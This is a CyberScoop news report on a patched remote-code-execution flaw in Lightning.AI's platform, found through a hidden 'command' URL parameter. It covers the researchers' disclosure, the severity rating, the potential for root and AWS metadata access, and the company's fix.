Advertisement

Vulnerability in popular AI developer could ‘shut down essentially everything you own’ 

The flaw in Lightning.AI’s platform, which has been patched, would have given root access to an attacker and broad control over a victim’s cloud-based studio and connected systems. 
Listen to this article
0:00
Learn more. This feature uses an automated voice, which may result in occasional errors in pronunciation, tone, or sentiment.
A flaw in Lightning.AI’s platform, which has been patched, would have given root access to an attacker and broad control over a victim’s cloud-based studio and connected systems. (Image Source: Getty Images)

A popular platform for developing AI systems has patched an easily exploitable vulnerability that would have given an attacker remote code execution privileges.

Researchers at application security firm Noma detail how the flaw, embedded in Javascript code for Lightning.AI’s development platform, could be manipulated to give an attacker virtually unfettered access to a user’s cloud studio, as well as the ability to execute arbitrary code, exfiltrate sensitive data and create, modify or delete files.

Noma researchers spotted a hidden parameter in the URL of the JavaScript code used in Lightning.AI’s software called “command.” By manipulating the command’s placement in the URL, an attacker can create malicious phishing links for specific victims and studios.

According to Noma, the vulnerability was discovered Oct. 14, 2024, and researchers began engaging with representatives from Lightning.AI over Discord the same day. A patch was developed and implemented by Oct. 25.

Advertisement

Gal Moyal, who works in the office of Noma’s chief technology officer, told CyberScoop that the vulnerability carries a CVSS severity rating of 9.4 and offers “root access with the … highest privileges there” are. A spokesperson for Noma told CyberScoop that a formal CVE ID was not requested for the flaw.

That level of access could have also threatened the security of other systems or subsystems that connect to a victim’s cloud studio, and potentially allow an attacker to move laterally to other systems. The command vulnerability could also be used to access the account’s AWS cloud metadata, potentially giving an attacker access to sensitive data, access tokens and user information.

“This is an example of a vulnerability which … can shut down essentially everything you own,” Moyal said. “This is every secret that you own; your AWS account, your platform within Lightning.AI, anything that was connected to Lightning.AI can now be used by a malicious actor to their want.”

Moyal said the inclusion of the hidden parameter was either a mistake that someone forgot to delete from the JavaScript code or a design flaw.

A spokesperson for Lightning.AI told CyberScoop that they do not have any evidence of the bug being exploited in the wild by malicious parties and have put additional security protections in place in addition to patching.

Advertisement

“Our security review confirmed no unauthorized access occurred before the fix,” the spokesperson said in an email. “Beyond patching, we strengthened input validation, tightened access controls, and reinforced internal security protocols to prevent similar risks.”

Lightning.AI (formerly Grid.AI) was founded in 2019 and has since become a widely used platform for developers to collaborate and build cloud-based AI systems. The company is an AWS partner and recently raised $50 million in equity from companies like JPMorgan Chase, NVIDIA, Cisco Investments and K5 Global.

The founders behind the company were also developers for PyTorch Lightning, a popular open-source tool that developers use to scale deep-learning AI systems that run on distributed hardware. The tool’s GitHub page has more than 28,000 stars and has been forked more than 3,400 times.  

In an interview with TechCrunch in November 2024, co-founder William Falcon claimed that NVIDIA’s suite of NeMo large language models and Stability.AI’s Stable Diffusion tool were trained or built using Lightning.AI tools.

Moyal said the vulnerability is an example of how the rush to adopt emerging AI products could leave businesses more vulnerable to critical flaws like the one Noma found.

Advertisement

“We are in an AI world where everything is fast paced,” he said. “There is very high, accelerated adoption of AI, and right now, I feel like this is a very fertile ground for mistakes and bugs.”

Derek B. Johnson

Written by Derek B. Johnson

Derek B. Johnson is a reporter at CyberScoop, where his beat includes cybersecurity, elections and the federal government. Prior to that, he has provided award-winning coverage of cybersecurity news across the public and private sectors for various publications since 2017. Derek has a bachelor’s degree in print journalism from Hofstra University in New York and a master’s degree in public policy from George Mason University in Virginia.

Latest Podcasts